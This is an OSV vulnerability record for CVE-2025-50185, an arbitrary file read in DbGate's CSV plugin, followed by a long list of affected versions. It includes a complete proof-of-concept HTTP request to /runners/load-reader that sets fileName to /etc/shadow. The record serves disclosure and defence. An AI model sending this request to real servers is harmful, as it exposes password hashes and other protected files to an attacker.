{"id":"CVE-2025-50185","summary":"DbGate allows Unauthorized File Access via CSV Plugin","details":"DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\n\n\nLines of the file being returned:\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)","aliases":["GHSA-7x75-fmx7-q6h9"],"modified":"2026-04-10T05:29:54.210303Z","published":"2025-07-26T03:34:43.481Z","database_specific":{"cna_assigner":"GitHub_M","cwe_ids":["CWE-29"],"osv_generated_from":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/50xxx/CVE-2025-50185.json"},"references":[{"type":"WEB","url":"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/50xxx/CVE-2025-50185.json"},{"type":"ADVISORY","url":"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-50185"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/dbgate/dbgate","events":[{"introduced":"0"},{"last_affected":"0e06d283357effa6271515c6fe300ed348b4e662"}],"database_specific":{"versions":[{"introduced":"0"},{"last_affected":"6.6.0"}]}}],"versions":["list","packages-api-v1.0.6","packages-api-v1.0.7","packages-sqlitree-v1.0.4","packages-tools-v1.0.5","packages-tools-v1.0.6","packages-tools-v1.0.7","packages-tools-v4.0.0-rc-2","packages-tools-v4.0.0-rc.1","packages-tools-v4.1.0-rc.1","packages-types-v1.0.2","v0.0.1","v0.0.2","v0.5.0","v0.5.1","v0.5.3","v0.5.4","v0.5.5","v3.7.0","v3.7.1","v3.7.10","v3.7.11","v3.7.12","v3.7.13","v3.7.14","v3.7.15","v3.7.16","v3.7.17","v3.7.18","v3.7.19","v3.7.2","v3.7.20","v3.7.21","v3.7.22","v3.7.23","v3.7.24","v3.7.25","v3.7.26","v3.7.27","v3.7.28","v3.7.29","v3.7.3","v3.7.30","v3.7.31","v3.7.32","v3.7.33","v3.7.4","v3.7.5","v3.7.6","v3.7.7","v3.7.8","v3.7.9","v3.8.1","v3.8.10","v3.8.11","v3.8.12","v3.8.13","v3.8.14","v3.8.15","v3.8.16","v3.8.17","v3.8.18","v3.8.19","v3.8.2","v3.8.20","v3.8.21","v3.8.22","v3.8.23","v3.8.24","v3.8.25","v3.8.26","v3.8.27","v3.8.28","v3.8.29","v3.8.3","v3.8.30","v3.8.31","v3.8.32","v3.8.33","v3.8.34","v3.8.35","v3.8.36","v3.8.37","v3.8.38","v3.8.39","v3.8.4","v3.8.40","v3.8.5","v3.8.6","v3.8.7","v3.8.8","v3.8.9","v3.9.0-beta.1","v3.9.0-beta.2","v3.9.0-beta.3","v3.9.1","v3.9.1-beta.1","v3.9.1-beta.2","v3.9.2","v3.9.2-beta.1","v3.9.3","v3.9.3-beta.1","v3.9.4","v3.9.5","v3.9.5-beta.1","v3.9.5-beta.2","v3.9.6","v3.9.6-alpha.1","v3.9.6-alpha.10","v3.9.6-alpha.11","v3.9.6-alpha.12","v3.9.6-alpha.13","v3.9.6-alpha.14","v3.9.6-alpha.2","v3.9.6-alpha.3","v3.9.6-alpha.4","v3.9.6-alpha.5","v3.9.6-alpha.6","v3.9.6-alpha.7","v3.9.6-alpha.9","v3.9.6-beta.1","v3.9.6-beta.2","v3.9.6-beta.3","v3.9.6-beta.4","v3.9.6-beta.5","v3.9.6-beta.6","v3.9.6-beta.7","v4.0.0","v4.0.0-beta.1","v4.0.0-beta.2","v4.0.0-beta.3","v4.0.0-beta.4","v4.0.0-beta.5","v4.0.1","v4.0.2","v4.0.3-beta.1","v4.1.0","v4.1.0-beta.1","v4.1.0-beta.2","v4.1.1","v4.1.1-beta.1","v4.1.1-beta.2","v4.1.1-beta.3","v4.1.10-beta.1","v4.1.10-beta.2","v4.1.10-beta.3","v4.1.10-beta.4","v4.1.10-beta.5","v4.1.2","v4.1.3","v4.1.4","v4.1.4-beta.1","v4.1.5","v4.1.5-beta.1","v4.1.5-beta.2","v4.1.6","v4.1.7","v4.1.8","v4.1.8-beta.1","v4.1.9","v4.1.9-beta.1","v4.2.0","v4.2.0-beta.1","v4.2.0-beta.10","v4.2.0-beta.2","v4.2.0-beta.3","v4.2.0-beta.5","v4.2.0-beta.6","v4.2.0-beta.7","v4.2.0-beta.8","v4.2.0-beta.9","v4.2.1-beta.1","v4.2.3","v4.2.3-beta.1","v4.2.3-beta.10","v4.2.3-beta.11","v4.2.3-beta.2","v4.2.3-beta.3","v4.2.3-beta.7","v4.2.3-beta.8","v4.2.3-beta.9","v4.2.4","v4.2.4-beta.1","v4.2.4-beta.3","v4.2.4-beta.4","v4.2.5-beta.1","v4.2.5-beta.2","v4.3.0-beta.1","v4.3.0-beta.2","v4.3.0-beta.3","v4.3.0-beta.4","v4.3.0-beta.5","v4.3.0-beta.6","v4.3.0-beta.7","v4.3.0-beta.8","v4.4.0","v4.4.0-alpha.1","v4.4.0-alpha.2","v4.4.0-beta.1","v4.4.0-beta.2","v4.4.0-beta.3","v4.4.0-beta.4","v4.4.1","v4.4.1-beta.1","v4.4.1-beta.2","v4.4.1-beta.3","v4.4.1-beta.4","v4.4.2","v4.4.2-beta.1","v4.4.2-beta.2","v4.4.2-beta.3","v4.4.2-beta.4","v4.4.3","v4.4.3-beta.1","v4.4.3-beta.2","v4.4.3-beta.3","v4.4.3-beta.4","v4.4.4","v4.4.4-beta.1","v4.4.4-beta.2","v4.4.4-beta.3","v4.4.4-beta.4","v4.4.5-beta.1","v4.4.5-beta.2","v4.5.0","v4.5.0-beta.1","v4.5.0-beta.2","v4.5.0-beta.3","v4.5.0-beta.4","v4.5.1","v4.5.1-beta.1","v4.5.1-beta.2","v4.5.1-beta.3","v4.6.0","v4.6.1","v4.6.1-beta.1","v4.6.1-beta.2","v4.6.1-beta.3","v4.6.2","v4.6.2-beta.1","v4.6.2-beta.2","v4.6.2-beta.4","v4.6.3","v4.6.3-beta.1","v4.6.3-beta.2","v4.6.4-beta.1","v4.6.4-beta.2","v4.6.4-beta.3","v4.6.4-docker.4","v4.6.4-docker.5","v4.7.0","v4.7.0-beta.1","v4.7.0-beta.2","v4.7.0-beta.3","v4.7.0-beta.4","v4.7.1","v4.7.1-beta.6","v4.7.1-beta.8","v4.7.1-docker.1","v4.7.1-docker.2","v4.7.1-docker.7","v4.7.2","v4.7.2-beta.2","v4.7.2-beta.3","v4.7.2-docker.1","v4.7.3","v4.7.3-alpha.2","v4.7.3-alpha.3","v4.7.3-alpha.5","v4.7.3-beta.1","v4.7.3-beta.4","v4.7.3-beta.6","v4.7.3-beta.7","v4.7.3-beta.8","v4.7.4","v4.7.4-alpha.1","v4.7.4-alpha.10","v4.7.4-alpha.12","v4.7.4-alpha.14","v4.7.4-alpha.15","v4.7.4-alpha.16","v4.7.4-alpha.2","v4.7.4-alpha.3","v4.7.4-alpha.7","v4.7.4-alpha.8","v4.7.4-beta.11","v4.7.4-beta.13","v4.7.4-beta.17","v4.7.4-beta.4","v4.7.4-beta.5","v4.7.4-beta.6","v4.7.4-beta.9","v4.7.5-beta.1","v4.8.0","v4.8.0-beta.1","v4.8.1","v4.8.1-beta.1","v4.8.2","v4.8.2-beta.1","v4.8.2-beta.2","v4.8.3","v4.8.3-beta.1","v4.8.3-beta.2","v4.8.3-beta.3","v4.8.4","v4.8.4-beta.1","v4.8.4-beta.7","v4.8.4-beta.8","v4.8.5","v4.8.6","v4.8.7","v4.8.7-beta.1","v4.8.7-beta.2","v4.8.8","v4.8.8-beta.1","v4.8.8-beta.2","v4.8.8-beta.3","v4.8.8-beta.4","v4.8.8-beta.5","v4.8.8-beta.6","v4.8.9-beta.1","v5.0.1","v5.0.1-beta.1","v5.0.2-beta.1","v5.0.2-beta.2","v5.0.3","v5.0.3-beta.1","v5.0.3-beta.2","v5.0.3-beta.3","v5.0.3-beta.4","v5.0.3-beta.5","v5.0.4-alpha.2","v5.0.4-alpha.7","v5.0.4-alpha.8","v5.0.4-beta.3","v5.0.4-beta.4","v5.0.4-beta.5","v5.0.4-beta.6","v5.0.4-beta.9","v5.0.5","v5.0.6","v5.0.6-alpha.2","v5.0.6-beta.1","v5.0.6-beta.3","v5.0.6-beta.5","v5.0.6-beta.6","v5.0.7","v5.0.7-beta.1","v5.0.7-beta.2","v5.0.7-beta.3","v5.0.7-beta.4","v5.0.7-beta.5","v5.0.8","v5.0.8-beta.1","v5.0.8-beta.2","v5.0.8-beta.3","v5.0.8-beta.4","v5.0.9","v5.0.9-beta.1","v5.1.0","v5.1.0-beta.4","v5.1.1","v5.1.1-beta.1","v5.1.1-beta.2","v5.1.1-beta.3","v5.1.1-beta.4","v5.1.1-beta.5","v5.1.2","v5.1.2-beta.1","v5.1.2-beta.2","v5.1.2-beta.3","v5.1.2-beta.4","v5.1.2-beta.5","v5.1.3","v5.1.3-beta.1","v5.1.3-beta.2","v5.1.4","v5.1.4-beta.10","v5.1.4-beta.11","v5.1.4-docker.1","v5.1.4-docker.2","v5.1.4-docker.3","v5.1.4-docker.4","v5.1.4-docker.5","v5.1.4-docker.6","v5.1.4-docker.7","v5.1.4-docker.8","v5.1.4-docker.9","v5.1.5","v5.1.6","v5.1.6-beta.1","v5.1.6-beta.2","v5.1.6-beta.3","v5.1.6-beta.4","v5.1.6-beta.5","v5.1.6-beta.6","v5.1.6-beta.7","v5.1.7-alpha.13","v5.1.7-alpha.14","v5.1.7-beta.10","v5.1.7-beta.11","v5.1.7-beta.12","v5.1.7-beta.2","v5.1.7-beta.3","v5.1.7-beta.4","v5.1.7-beta.5","v5.1.7-beta.6","v5.1.7-beta.7","v5.1.7-beta.8","v5.1.7-beta.9","v5.2.0","v5.2.1","v5.2.1-beta.1","v5.2.1-beta.2","v5.2.1-beta.3","v5.2.10-beta.1","v5.2.10-beta.4","v5.2.2","v5.2.2-alpha.11","v5.2.2-alpha.12","v5.2.2-alpha.13","v5.2.2-beta.2","v5.2.2-beta.3","v5.2.2-beta.4","v5.2.2-beta.5","v5.2.2-beta.7","v5.2.2-beta.8","v5.2.2-beta.9","v5.2.3","v5.2.3-beta.1","v5.2.3-beta.2","v5.2.3-beta.3","v5.2.3-beta.4","v5.2.3-beta.5","v5.2.3-beta.6","v5.2.3-beta.9","v5.2.4","v5.2.4-alpha.1","v5.2.5","v5.2.5-beta.16","v5.2.5-beta.17","v5.2.6","v5.2.6-beta.2","v5.2.6-beta.6","v5.2.6-beta.7","v5.2.6-beta.8","v5.2.6-beta.9","v5.2.7","v5.2.7-alpha.1","v5.2.7-beta.1","v5.2.7-beta.2","v5.2.8","v5.2.8-beta.1","v5.2.8-beta.11","v5.2.8-beta.12","v5.2.8-beta.17","v5.2.8-beta.23","v5.2.8-beta.24","v5.2.8-beta.7","v5.2.8-beta.9","v5.2.9","v5.2.9-beta.1","v5.2.9-beta.2","v5.2.9-beta.3","v5.2.9-beta.4","v5.2.9-beta.5","v5.2.9-beta.6","v5.3.0","v5.3.1","v5.3.1-beta.1","v5.3.1-beta.2","v5.3.1-beta.3","v5.3.2-beta.1","v5.3.2-beta.2","v5.3.2-beta.3","v5.3.2-pro.4","v5.3.3","v5.3.4","v5.3.4-beta.1","v5.3.5-beta.1","v5.3.5-beta.10","v5.3.5-beta.11","v5.3.5-beta.12","v5.3.5-beta.13","v5.3.5-beta.2","v5.3.5-beta.23","v5.3.5-beta.24","v5.3.5-beta.3","v5.3.5-pro.14","v5.3.5-pro.15","v5.3.5-pro.16","v5.3.5-pro.17","v5.3.5-pro.18","v5.3.5-pro.19","v5.3.5-pro.20","v5.3.5-pro.21","v5.3.5-pro.22","v5.4.0","v5.4.1","v5.4.1-beta.1","v5.4.1-beta.2","v5.4.2-beta.7","v5.4.2-pro.1","v5.4.2-pro.2","v5.4.2-pro.3","v5.4.2-pro.5","v5.4.2-pro.6","v5.4.4","v5.4.4-beta.1","v5.4.4-beta.11","v5.4.4-beta.12","v5.4.4-beta.2","v5.4.4-beta.3","v5.4.4-premium-beta.5","v5.4.5-beta.11","v5.4.5-beta.13","v5.4.5-beta.14","v5.4.5-beta.15","v5.4.5-beta.6","v5.4.5-beta.7","v5.4.5-premium-beta.12","v5.5.1","v5.5.2","v5.5.3","v5.5.3-beta.1","v5.5.3-beta.3","v5.5.3-beta.4","v5.5.4","v5.5.4-alpha.1","v5.5.4-alpha.2","v5.5.4-alpha.3","v5.5.4-alpha.4","v5.5.4-alpha.7","v5.5.4-alpha.8","v5.5.4-beta.10","v5.5.4-beta.5","v5.5.4-premium-beta.6","v5.5.4-premium-beta.9","v5.5.5","v5.5.5-beta.3","v5.5.5-premium-beta.1","v5.5.5-premium-beta.2","v5.5.5-premium-beta.4","v5.5.5-premium-beta.5","v5.5.6","v5.5.6-beta.1","v5.5.6-beta.11","v5.5.6-beta.3","v5.5.6-beta.4","v5.5.6-premium-beta.10","v5.5.6-premium-beta.2","v5.5.6-premium-beta.5","v5.5.6-premium-beta.6","v5.5.6-premium-beta.7","v5.5.6-premium-beta.8","v5.5.6-premium-beta.9","v5.5.7-alpha.16","v5.5.7-alpha.25","v5.5.7-alpha.26","v5.5.7-alpha.27","v5.5.7-alpha.28","v5.5.7-alpha.29","v5.5.7-alpha.52","v5.5.7-alpha.53","v5.5.7-alpha.60","v5.5.7-alpha.68","v5.5.7-beta.14","v5.5.7-beta.15","v5.5.7-beta.22","v5.5.7-beta.54","v5.5.7-beta.55","v5.5.7-beta.56","v5.5.7-beta.57","v5.5.7-beta.58","v5.5.7-beta.59","v5.5.7-beta.61","v5.5.7-beta.62","v5.5.7-beta.63","v5.5.7-beta.64","v5.5.7-beta.66","v5.5.7-beta.67","v5.5.7-beta.69","v5.5.7-packer-beta.1","v5.5.7-packer-beta.17","v5.5.7-packer-beta.18","v5.5.7-packer-beta.19","v5.5.7-packer-beta.2","v5.5.7-packer-beta.20","v5.5.7-packer-beta.21","v5.5.7-packer-beta.3","v5.5.7-packer-beta.4","v5.5.7-packer-beta.6","v5.5.7-packer-beta.7","v5.5.7-packer.17","v5.5.7-premium-beta.23","v5.5.7-premium-beta.24","v5.5.7-premium-beta.65","v6.0.0","v6.0.0-alpha.1","v6.0.0-beta.3","v6.0.0-beta.4","v6.0.0-premium-beta.2","v6.0.0-premium-beta.5","v6.0.0-premium-beta.6","v6.0.1-beta.3","v6.0.1-beta.4","v6.0.1-beta.5","v6.0.1-beta.6","v6.0.1-packer-beta.1","v6.0.1-packer-beta.2","v6.1.0","v6.1.1","v6.1.1-beta.1","v6.1.2","v6.1.2-beta.1","v6.1.2-beta.10","v6.1.2-beta.11","v6.1.2-beta.12","v6.1.2-beta.13","v6.1.2-beta.17","v6.1.2-beta.2","v6.1.2-beta.3","v6.1.2-beta.4","v6.1.2-beta.5","v6.1.2-beta.6","v6.1.2-beta.7","v6.1.2-beta.8","v6.1.2-beta.9","v6.1.2-premium-beta.14","v6.1.2-premium-beta.15","v6.1.2-premium-beta.16","v6.1.2-premium-beta.18","v6.1.3","v6.1.3-beta.2","v6.1.3-premium-beta.4","v6.2.1","v6.2.1-beta.1","v6.2.1-beta.3","v6.2.1-beta.4","v6.2.1-beta.5","v6.2.1-beta.8","v6.2.1-premium-beta.11","v6.2.1-premium-beta.2","v6.2.1-premium-beta.6","v6.2.1-premium-beta.7","v6.2.1-premium-beta.9","v6.2.2-beta.10","v6.2.2-packer-beta.2","v6.2.2-packer-beta.3","v6.2.2-packer-beta.4","v6.2.2-packer.1","v6.2.2-premium-beta.5","v6.2.2-premium-beta.6","v6.2.2-premium-beta.7","v6.2.2-premium-beta.8","v6.2.2-premium-beta.9","v6.3.2","v6.3.2-beta.1","v6.3.2-beta.2","v6.3.2-premium-beta.3","v6.3.2-premium-beta.4","v6.3.3","v6.3.3-premium-beta.1","v6.3.3-premium-beta.2","v6.3.4-beta.2","v6.3.4-beta.4","v6.3.4-premium-beta.1","v6.3.4-premium-beta.3","v6.3.4-premium-beta.5","v6.4.0","v6.4.1","v6.4.1-beta.2","v6.4.2","v6.4.2-beta.1","v6.4.2-premium-beta.2","v6.4.2-premium-beta.3","v6.4.3-alpha.1","v6.4.3-beta.3","v6.4.3-beta.8","v6.4.3-beta.9","v6.4.3-premium-beta.10","v6.4.3-premium-beta.4","v6.4.3-premium-beta.5","v6.4.3-premium-beta.6","v6.4.3-premium-beta.7","v6.5.0","v6.5.1","v6.5.1-beta.1","v6.5.2","v6.5.2-premium-beta.1","v6.5.3","v6.5.3-premium-beta.1","v6.5.4","v6.5.4-premium-beta.1","v6.5.5","v6.5.5-premium-beta.1","v6.5.5-premium-beta.2","v6.5.5-premium-beta.3","v6.5.5-premium-beta.4","v6.5.5-premium-beta.5","v6.5.6","v6.5.6-beta.2","v6.5.6-premium-beta.1","v6.5.6-premium-beta.4","v6.5.6-premium-beta.5","v6.5.7-beta.5","v6.5.7-premium-beta.1","v6.5.7-premium-beta.2","v6.5.7-premium-beta.3","v6.5.7-premium-beta.6","v6.6.0"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-50185.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"}]}